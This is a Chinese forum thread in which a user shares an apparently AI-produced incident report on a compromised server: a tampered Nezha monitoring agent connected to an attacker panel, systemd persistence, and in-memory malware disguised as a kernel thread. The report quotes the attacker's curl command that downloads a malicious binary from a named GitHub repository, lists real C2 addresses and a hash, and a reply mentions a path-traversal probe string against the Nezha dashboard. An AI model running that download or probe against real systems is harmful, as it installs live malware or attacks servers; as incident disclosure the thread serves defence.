哪吒爆破被黑客入侵,agent二进制文件被替换成恶意文件

liohao 2026-06-19 00:12 1

使用ai检查了下服务器,发现被安装了两个哪吒agent,有个不认识的IP马上用ai检查了一番,下面是ai检测报告,还是蛮牛逼的


安全调查报告:黑客入侵分析

攻击时间线

第一阶段:2026-06-13 23:39:11 - 后门植入

入侵者在此时刻执行了以下操作:


替换了 nezha-agent 二进制文件

原始文件创建于 2025-12-01,被修改为 2026-06-13

SHA256: e7260c1b6a0e932a28e36e835f15b01f2109fdce6f835b6fec74594a46fd94f0

创建了恶意配置文件 /opt/nezha/agent/config-14q19.yml


连接黑客控制的服务器:207.58.173.192:8088

UUID: fb0b7656-0425-5adc-ee26-900540a172e1

注册了 systemd 服务 nezha-agent-63a2606.service 实现持久化


第二阶段:2026-06-15 23:27:36 - 恶意软件部署

入侵者下载并部署了更危险的恶意软件:


下载脚本 /tmp/download.sh:

bash


curl -L "https://raw.githubusercontent.com/ariennenphilipwinifre51981/ariennenphilipwinifre51981.github.io/refs/heads/main/SystemLog" -o /opt/systemlog/SystemLog

部署了两个恶意二进制文件:

/tmp/SystemLog (3.2MB) - 运行中,PID: 1909608

/opt/systemlog/SystemLoger (9.8KB) - 运行中,PID: 1918576

第三阶段:2026-06-16 02:07:12 - 建立持久化

创建了系统服务实现开机自启:


服务文件:/etc/systemd/system/systemlog.service

服务状态:active (running),已设置为开机自启

当前活跃的恶意进程


PID 进程名 特征 状态

1909608 /tmp/SystemLog 运行时间 88+ 小时 正在连接 C2 服务器

1918576 memfd:a 伪装为 [kworker/0:2] 内核线程 正在连接 C2 服务器

1913539 memfd:a 内存映射执行 正在连接 C2 服务器

恶意软件 C2 服务器:24.144.123.109:80


PID 1909608: SYN-SENT → 24.144.123.109:80

PID 1918576: SYN-SENT → 24.144.123.109:80

恶意软件技术分析

高级规避技术:


内存执行 (memfd:a) - 二进制文件直接在内存中运行,不写入磁盘,逃避文件扫描

进程伪装 - 伪装成内核工作线程 [kworker/0:2]

自删除 - 使用 (deleted) 标记隐藏真实路径

双重持久化 - 同时使用文件系统和内存驻留

恶意软件来源:


GitHub 仓库:ariennenphilipwinifre51981/ariennenphilipwinifre51981.github.io

这是一个专门用于托管恶意软件的 GitHub 账户

黑客控制的服务器


IP 端口 用途 状态

207.58.173.192 8088 哪吒监控面板 恶意 agent 连接中

24.144.123.109 80 C2 命令控制服务器 恶意软件正在连接

入侵路径分析

根据日志分析,攻击者可能通过以下方式入侵:


利用哪吒监控 agent 的漏洞或弱凭据获取初始访问

替换合法的 nezha-agent 二进制文件为恶意版本

部署额外的恶意软件建立更深层的控制

注意:SSH 认证日志中没有发现该 IP 的直接登录记录,说明攻击者可能通过其他方式(如 agent 漏洞)获取了 root 权限。

最新回复 (11)
  • hebghw 06-19 00:19
    1

    重新装系统吧

  • lnx 06-19 00:29
    2

    卧槽,太吓人了

  • liohao 楼主 06-19 00:49
    3

    提醒大家装过哪吒的都检查下服务器,防止有这种潜伏的黑客,这个家伙 06-13 就入侵了服务器 06-15 才进行下一步行动,可见潜伏的多深!

    我之前在哪吒面板端检查ng日志都没发现 /dashboard../data/config.yaml 之类的访问记录,所以升级了哪吒就没管了,要不是今天又用ai检查了一次我都不知道我中招了

  • huilang 06-19 01:02
    4

    前天论坛都在讨论这个 你信息有点落后啊

  • liohao 楼主 06-19 01:31
    5

    @huilang #4 发布于2026/6/19 01:02:21

    前天论坛都在讨论这个 你信息有点落后啊


    又发现一个加壳文件,不知道是干嘛的,/usr/bin/4c8471e5tcp

    害,所以吃大亏了,更换秘钥装系统去了,不过还好没给我搞个勒索病毒,要不然得爆炸

  • huilang 06-19 01:32
    6

    别侥幸 重置就行了

  • lehuoyisheng 06-19 13:14
    7

    重装吧

  • 佳辰 06-19 13:14
    8

    村通网 ^-^

  • Laktop 06-19 13:17
    9

    好奇怎么用ai检查自己的vps

  • liohao 楼主 06-19 13:21
    10

    @Laktop #9 Netcatty 在github上搜索安装

  • Laktop 06-19 13:26
    11

    谢谢

* 帖子来源NodeSeek
返回